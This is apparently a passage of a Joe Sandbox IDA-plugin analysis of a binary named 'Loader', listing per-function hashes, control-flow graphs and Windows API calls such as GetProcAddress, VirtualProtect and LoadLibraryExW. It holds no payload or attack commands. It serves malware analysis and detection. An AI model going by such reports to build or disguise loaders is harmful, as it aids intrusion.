                                                                                          • Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                          • Instruction ID: 1891f71480268063efe202a7b735b156c1e7c8ea566715218bbe1ce8df8a0e02
                                                                                          • Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                          • Instruction Fuzzy Hash: E8B1087660064AAFDB60CF68CC80FDA73A5FF88714F158524EA08AB351D770FA45CB94

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2037879342.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2037428148.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037914923.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037940750.0000000000350000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038010974.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038086768.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038250351.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$AddressCloseCreateHandleProcSize
                                                                                          • String ID: CreateFileA
                                                                                          • API String ID: 2547132502-1429953656
                                                                                          • Opcode ID: bcaace1852efb5552b20a57389d809474cd5f3f9f35b96ca0830673504547e1f
                                                                                          • Instruction ID: 533097114c8b68555f689c5a1a8f3d0cb896ec2f5760232fc5e9618ce9abc82c
                                                                                          • Opcode Fuzzy Hash: bcaace1852efb5552b20a57389d809474cd5f3f9f35b96ca0830673504547e1f
                                                                                          • Instruction Fuzzy Hash: D14107B4D08219DFCB01EFA8D5487AEBBF0BF49310F008429E899AB350D774A545CF92

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 42 336602-33660e 43 3366a0-3366a3 42->43 44 336613-336624 43->44 45 3366a9 43->45 47 336631-33664a LoadLibraryExW 44->47 48 336626-336629 44->48 46 3366ab-3366af 45->46 51 3366b0-3366c0 47->51 52 33664c-336655 GetLastError 47->52 49 3366c9-3366cb 48->49 50 33662f 48->50 49->46 54 33669d 50->54 51->49 53 3366c2-3366c3 FreeLibrary 51->53 55 336657-336669 call 339cc4 52->55 56 33668e-33669b 52->56 53->49 54->43 55->56 59 33666b-33667d call 339cc4 55->59 56->54 59->56 62 33667f-33668c LoadLibraryExW 59->62 62->51 62->56
                                                                                          APIs
                                                                                          • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00000000,?,DAF5BA3C,?,00336711,00000000,00000000,00000000,00000000), ref: 003366C3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2037879342.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2037428148.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037914923.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037940750.0000000000350000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038010974.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038086768.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038250351.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeLibrary
                                                                                          • String ID: api-ms-$ext-ms-
                                                                                          • API String ID: 3664257935-537541572
                                                                                          • Opcode ID: 430e5cd0b8a33b51684df382fe25dd9dc5cf1c382a94b3ea0e4146084f0a7e5a
                                                                                          • Instruction ID: 1d84201713488179e8682a226fb5ea9b2a8a10ea12645d5fd4000f3359c4771e
                                                                                          • Opcode Fuzzy Hash: 430e5cd0b8a33b51684df382fe25dd9dc5cf1c382a94b3ea0e4146084f0a7e5a
                                                                                          • Instruction Fuzzy Hash: 5F21D835A01215BFC7339B61DCC7A5A376CAB417A1F164114ED05AB290DB70FD00CAD1

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 63 336dea-336e03 64 336e05-336e15 call 32f11d 63->64 65 336e19-336e1e 63->65 64->65 71 336e17 64->71 66 336e20-336e28 65->66 67 336e2b-336e51 call 3356ff 65->67 66->67 73 336fc7-336fd8 call 327191 67->73 74 336e57-336e62 67->74 71->65 76 336fba 74->76 77 336e68-336e6d 74->77 81 336fbc 76->81 79 336e86-336e91 call 3356b1 77->79 80 336e6f-336e78 call 329f30 77->80 79->81 88 336e97 79->88 80->81 89 336e7e-336e84 80->89 83 336fbe-336fc5 call 329ec7 81->83 83->73 91 336e9d-336ea2 88->91 89->91 91->81 92 336ea8-336ebd call 3356ff 91->92 92->81 95 336ec3-336ed5 call 3364b3 92->95 97 336eda-336ede 95->97 97->81 98 336ee4-336eec 97->98 99 336f26-336f32 98->99 100 336eee-336ef3 98->100 101 336f34-336f36 99->101 102 336faf 99->102 100->83 103 336ef9-336efb 100->103 104 336f4b-336f56 call 3356b1 101->104 105 336f38-336f41 call 329f30 101->105 106 336fb1-336fb8 call 329ec7 102->106 103->81 107 336f01-336f1b call 3364b3 103->107 104->106 117 336f58 104->117 105->106 116 336f43-336f49 105->116 106->81 107->83 118 336f21 107->118 119 336f5e-336f63 116->119 117->119 118->81 119->106 120 336f65-336f7d call 3364b3 119->120 120->106 123 336f7f-336f86 120->123 124 336fa7-336fad 123->124 125 336f88-336f89 123->125 126 336f8a-336f9c call 3357c1 124->126 125->126 126->106 129 336f9e-336fa5 call 329ec7 126->129 129->83
                                                                                          APIs
                                                                                          • __alloca_probe_16.LIBCMT ref: 00336E6F
                                                                                          • __alloca_probe_16.LIBCMT ref: 00336F38
                                                                                          • __freea.LIBCMT ref: 00336F9F
                                                                                            • Part of subcall function 003356B1: RtlAllocateHeap.NTDLL(00000000,00337635,?,?,00337635,00000220,?,?,?), ref: 003356E3
                                                                                          • __freea.LIBCMT ref: 00336FB2
                                                                                          • __freea.LIBCMT ref: 00336FBF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2037879342.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2037428148.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037914923.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037940750.0000000000350000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038010974.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038086768.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038250351.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                          • String ID:
                                                                                          • API String ID: 1423051803-0
                                                                                          • Opcode ID: de51947b728e4919af57dfe1cd0a94c718167b8bde213adfcc00fc8eb440f645
                                                                                          • Instruction ID: 0935bc0dcdd65d179d7e615509e28c55c42d1e6411cfc8462f3ff133af578565
                                                                                          • Opcode Fuzzy Hash: de51947b728e4919af57dfe1cd0a94c718167b8bde213adfcc00fc8eb440f645
                                                                                          • Instruction Fuzzy Hash: 00519172600206BFDB239E61ECC3EABBAA9DF44710F16812DFD05DB201EB71DC1096A0

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 132 321db0-321e7e call 321000 * 2 GetProcAddress 137 321e84-321e8c 132->137 138 321e8f-321ecb VirtualProtect 132->138 137->138 140 321ed1-321ed7 call 321bd0 138->140 141 321edc-321ef3 call 327191 138->141 140->141
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2037879342.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2037428148.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037914923.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037940750.0000000000350000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038010974.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038086768.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038250351.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressProcProtectVirtual
                                                                                          • String ID: @$VirtualProtect
                                                                                          • API String ID: 3759838892-29487290
                                                                                          • Opcode ID: c7c1b6711b0159b3e52762f7d6f40ae089c0182dce2b6d27aa10084c52aa6c94
                                                                                          • Instruction ID: 2635ce674508395ded6456a8138abe65c4f14bec2dc8719c72f4caadf55bcbbd
                                                                                          • Opcode Fuzzy Hash: c7c1b6711b0159b3e52762f7d6f40ae089c0182dce2b6d27aa10084c52aa6c94
                                                                                          • Instruction Fuzzy Hash: BD41F3B4901319DFDB04DFA9E99869EBBF4FF08304F118419E858AB390D775A984CF81

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • GetCurrentProcess.KERNEL32(0032F160,?,0032F315,00000000,?,?,0032F160,DAF5BA3C,?,0032F160), ref: 0032F264
                                                                                          • TerminateProcess.KERNEL32(00000000,?,0032F315,00000000,?,?,0032F160,DAF5BA3C,?,0032F160), ref: 0032F26B
                                                                                          • ExitProcess.KERNEL32 ref: 0032F27D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2037879342.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2037428148.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037914923.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037940750.0000000000350000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038010974.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038086768.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038250351.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                          • String ID:
                                                                                          • API String ID: 1703294689-0
                                                                                          • Opcode ID: 42a87f7ce5e3f35e5297d09c4b543afcd3b967ad1804c294b12521b0422fd5d1
                                                                                          • Instruction ID: 8fb713e86db923a29d2ebaed5067818bbede0693577fa480cb3c3ad19abead0d
                                                                                          • Opcode Fuzzy Hash: 42a87f7ce5e3f35e5297d09c4b543afcd3b967ad1804c294b12521b0422fd5d1
                                                                                          • Instruction Fuzzy Hash: 59D06C3A000228EFDF022F60EC098593F7ABF4A765B884434B9095E162DF36A9529A81

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 152 33d364-33d386 153 33d579 152->153 154 33d38c-33d38e 152->154 155 33d57b-33d57f 153->155 156 33d390-33d3af call 331b68 154->156 157 33d3ba-33d3dd 154->157 165 33d3b2-33d3b5 156->165 159 33d3e3-33d3e9 157->159 160 33d3df-33d3e1 157->160 159->156 161 33d3eb-33d3fc 159->161 160->159 160->161 163 33d40f-33d41f call 33d691 161->163 164 33d3fe-33d40c call 33c112 161->164 170 33d421-33d427 163->170 171 33d468-33d47a 163->171 164->163 165->155 174 33d450-33d466 call 33d70e 170->174 175 33d429-33d42c 170->175 172 33d4d1-33d4f1 WriteFile 171->172 173 33d47c-33d482 171->173 176 33d4f3-33d4f9 GetLastError 172->176 177 33d4fc 172->177 179 33d484-33d487 173->179 180 33d4bd-33d4ca call 33db3d 173->180 190 33d449-33d44b 174->190 181 33d437-33d446 call 33dad5 175->181 182 33d42e-33d431 175->182 176->177 184 33d4ff-33d50a 177->184 185 33d4a9-33d4bb call 33dd01 179->185 186 33d489-33d48c 179->186 197 33d4cf 180->197 181->190 182->181 187 33d511-33d514 182->187 191 33d574-33d577 184->191 192 33d50c-33d50f 184->192 202 33d4a4-33d4a7 185->202 193 33d517-33d519 186->193 194 33d492-33d49f call 33dc18 186->194 187->193 190->184 191->155 192->187 198 33d547-33d553 193->198 199 33d51b-33d520 193->199 194->202 197->202 205 33d555-33d55b 198->205 206 33d55d-33d56f 198->206 203 33d522-33d534 199->203 204 33d539-33d542 call 331360 199->204 202->190 203->165 204->165 205->153 205->206 206->165
                                                                                          APIs
                                                                                            • Part of subcall function 0033D70E: GetConsoleOutputCP.KERNEL32(DAF5BA3C,00000000,00000000,?), ref: 0033D771
                                                                                          • WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,?,?,?,0032D7F2,?,0032DA54), ref: 0033D4E9
                                                                                          • GetLastError.KERNEL32(?,0032D7F2,?,0032DA54,?,0032DA54,?,?,?,?,?,?,?,00000000,?,?), ref: 0033D4F3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2037879342.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2037428148.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037914923.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037940750.0000000000350000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038010974.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038086768.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038250351.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: ConsoleErrorFileLastOutputWrite
                                                                                          • String ID:
                                                                                          • API String ID: 2915228174-0
                                                                                          • Opcode ID: c8344977f458d590ce0ade7488d9d752503cf598e1a0be4f0afd4f8c99f25762
                                                                                          • Instruction ID: e3a287b1b91ee3e0c4b7587c5622a7ee6256138fd4b1113272d65a275f51659e
                                                                                          • Opcode Fuzzy Hash: c8344977f458d590ce0ade7488d9d752503cf598e1a0be4f0afd4f8c99f25762
                                                                                          • Instruction Fuzzy Hash: 7961B2B5D04219AFDF13CFA8E8C4AEEBBB9AF4A314F150145F804AB252D735D941CBA1

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 209 337268-337290 call 33746d 212 337296-33729c 209->212 213 337455-337456 call 3374de 209->213 214 33729f-3372a5 212->214 216 33745b-33745d 213->216 217 3373a1-3373c0 call 32c650 214->217 218 3372ab-3372b7 214->218 219 33745e-33746c call 327191 216->219 228 3373c3-3373c8 217->228 218->214 220 3372b9-3372bf 218->220 223 3372c5-3372d1 IsValidCodePage 220->223 224 337399-33739c 220->224 223->224 227 3372d7-3372de 223->227 224->219 229 337300-33730d GetCPInfo 227->229 230 3372e0-3372ec 227->230 231 337405-33740f 228->231 232 3373ca-3373cf 228->232 237 33730f-33732e call 32c650 229->237 238 33738d-337393 229->238 236 3372f0-3372fb 230->236 231->228 235 337411-33743b call 3377b9 231->235 233 337402 232->233 234 3373d1-3373d9 232->234 233->231 239 3373db-3373de 234->239 240 3373fa-337400 234->240 249 33743c-33744b 235->249 242 33744d-33744e call 3377f7 236->242 237->236 251 337330-337337 237->251 238->213 238->224 244 3373e0-3373e6 239->244 240->232 240->233 250 337453 242->250 244->240 248 3373e8-3373f8 244->248 248->240 248->244 249->242 249->249 250->216 252 337363-337366 251->252 253 337339-33733e 251->253 255 33736b-337372 252->255 253->252 254 337340-337348 253->254 256 33735b-337361 254->256 257 33734a-337351 254->257 255->255 258 337374-337388 call 3377b9 255->258 256->252 256->253 259 337352-337359 257->259 258->236 259->256 259->259
                                                                                          APIs
                                                                                            • Part of subcall function 0033746D: GetOEMCP.KERNEL32(00000000,?,?,?,?), ref: 00337498
                                                                                          • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,00337678,?,00000000,?,?,?), ref: 003372C9
                                                                                          • GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,00337678,?,00000000,?,?,?), ref: 00337305
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2037879342.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2037428148.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037914923.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037940750.0000000000350000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038010974.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038086768.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038250351.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: CodeInfoPageValid
                                                                                          • String ID:
                                                                                          • API String ID: 546120528-0
                                                                                          • Opcode ID: 41d49aed000e43b93fb3490782f043b878c2a349bbe8a1e2623cf74645d82804
                                                                                          • Instruction ID: 8e8942620e5680cb3a9c671763e42a39d5019291eb639514a66f219e3b8000ee
                                                                                          • Opcode Fuzzy Hash: 41d49aed000e43b93fb3490782f043b878c2a349bbe8a1e2623cf74645d82804
                                                                                          • Instruction Fuzzy Hash: 355123B4A082458EDB33CF36C8C06AEBBF5FF45310F19446ED4868B252D774A946DB90

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 262 33db3d-33db92 call 32a010 265 33dc07-33dc17 call 327191 262->265 266 33db94 262->266 268 33db9a 266->268 270 33dba0-33dba2 268->270 271 33dba4-33dba9 270->271 272 33dbbc-33dbe1 WriteFile 270->272 273 33dbb2-33dbba 271->273 274 33dbab-33dbb1 271->274 275 33dbe3-33dbee 272->275 276 33dbff-33dc05 GetLastError 272->276 273->270 273->272 274->273 275->265 277 33dbf0-33dbfb 275->277 276->265 277->268 278 33dbfd 277->278 278->265
                                                                                          APIs
                                                                                          • WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,?,?,0033D4CF,?,0032DA54,?,?,?,00000000), ref: 0033DBD9
                                                                                          • GetLastError.KERNEL32(?,0033D4CF,?,0032DA54,?,?,?,00000000,?,?,?,?,?,0032D7F2,?,0032DA54), ref: 0033DBFF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2037879342.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2037428148.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037914923.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037940750.0000000000350000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038010974.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038086768.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038250351.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorFileLastWrite
                                                                                          • String ID:
                                                                                          • API String ID: 442123175-0
                                                                                          • Opcode ID: cf30a28161da970bbfd73d022783c911183524502e7e599505a8fa7d58254f82
                                                                                          • Instruction ID: 0bd79d7fd1b7e19414da858371ffd9d83c95ebe970235d23021889b8c6dcd025
                                                                                          • Opcode Fuzzy Hash: cf30a28161da970bbfd73d022783c911183524502e7e599505a8fa7d58254f82
                                                                                          • Instruction Fuzzy Hash: 52219F34A102199BCF1ACF29EC809E9B7B9FB49305F1440A9E946D7251D630EE82CF60

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 279 337152-337157 280 337159-337171 279->280 281 337173-337177 280->281 282 33717f-337188 280->282 281->282 283 337179-33717d 281->283 284 33719a 282->284 285 33718a-33718d 282->285 286 3371f4-3371f8 283->286 289 33719c-3371a9 GetStdHandle 284->289 287 337196-337198 285->287 288 33718f-337194 285->288 286->280 290 3371fe-337201 286->290 287->289 288->289 291 3371d6-3371e8 289->291 292 3371ab-3371ad 289->292 291->286 293 3371ea-3371ed 291->293 292->291 294 3371af-3371b8 GetFileType 292->294 293->286 294->291 295 3371ba-3371c3 294->295 296 3371c5-3371c9 295->296 297 3371cb-3371ce 295->297 296->286 297->286 298 3371d0-3371d4 297->298 298->286
                                                                                          APIs
                                                                                          • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,00000000,00337041,0034FCD8,0000000C), ref: 0033719E
                                                                                          • GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,00000000,00337041,0034FCD8,0000000C), ref: 003371B0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2037879342.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2037428148.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037914923.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037940750.0000000000350000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038010974.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038086768.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038250351.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileHandleType
                                                                                          • String ID:
                                                                                          • API String ID: 3000768030-0
                                                                                          • Opcode ID: 74542d0a4b9eec4b1e332fbaef3d723c7cfebacf27a491f145a230be1c31ef94
                                                                                          • Instruction ID: 256c36c0d6d4359aab3bd5acac1ede51babecb15068eab9cc564b1ed0c57b413
                                                                                          • Opcode Fuzzy Hash: 74542d0a4b9eec4b1e332fbaef3d723c7cfebacf27a491f145a230be1c31ef94
                                                                                          • Instruction Fuzzy Hash: F91196B3D0C7514ACB324E3E8CC8A227AA9A757370F390759D4B7869F2D630D847D641

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • GetModuleHandleA.KERNEL32 ref: 00322038
                                                                                          • GetModuleFileNameW.KERNEL32 ref: 00322058
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2037879342.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2037428148.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037914923.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037940750.0000000000350000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038010974.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038086768.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038250351.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: Module$FileHandleName
                                                                                          • String ID:
                                                                                          • API String ID: 4146042529-0
                                                                                          • Opcode ID: f2195e9480c4cf17dc3b20de4db66b20079afb8b601e0d407cbd45d88ff7a4cd
                                                                                          • Instruction ID: b4235188145cda9e661f8f86414c2d41eb5d87b3d97afd9b78276f339bfca481
                                                                                          • Opcode Fuzzy Hash: f2195e9480c4cf17dc3b20de4db66b20079afb8b601e0d407cbd45d88ff7a4cd
                                                                                          • Instruction Fuzzy Hash: 7F01DAB09042189FCB15EF68E54969DBBF8FF48300F4045ADE49997241EB746A888F52

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 306 3364b3-3364c2 call 336822 309 3364c4-3364e9 LCMapStringEx 306->309 310 3364eb-336505 call 33654f LCMapStringW 306->310 314 33650b-33650d 309->314 310->314
                                                                                          APIs
                                                                                          • LCMapStringEx.KERNELBASE(?,00336EDA,?,?,-00000008,?,00000000,00000000,00000000,00000000,00000000), ref: 003364E7
                                                                                          • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,-00000008,-00000008,?,00336EDA,?,?,-00000008,?,00000000), ref: 00336505
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2037879342.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2037428148.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037914923.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037940750.0000000000350000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038010974.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038086768.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038250351.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: String
                                                                                          • String ID:
                                                                                          • API String ID: 2568140703-0
                                                                                          • Opcode ID: 491db9cd17aea077176b75f343a30fd4fa766b246f99f66fe625d28edb15ba40
                                                                                          • Instruction ID: 669c981efc4172fc35597076826a88ce0aef7c2a77cdb4103850695918c94468
                                                                                          • Opcode Fuzzy Hash: 491db9cd17aea077176b75f343a30fd4fa766b246f99f66fe625d28edb15ba40
                                                                                          • Instruction Fuzzy Hash: DDF07A3640011ABBCF136F91DC16DDE3F2AFF49760F058510FA1869020CB36D971AB90

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 315 335677-335680 316 335682-335695 RtlFreeHeap 315->316 317 3356af-3356b0 315->317 316->317 318 335697-3356ae GetLastError call 33131d call 3312d4 316->318 318->317
                                                                                          APIs
                                                                                          • RtlFreeHeap.NTDLL(00000000,00000000,?,00339A24,?,00000000,?,?,003396C4,?,00000007,?,?,0033A00A,?,?), ref: 0033568D
                                                                                          • GetLastError.KERNEL32(?,?,00339A24,?,00000000,?,?,003396C4,?,00000007,?,?,0033A00A,?,?), ref: 00335698
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2037879342.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2037428148.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037914923.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037940750.0000000000350000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038010974.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
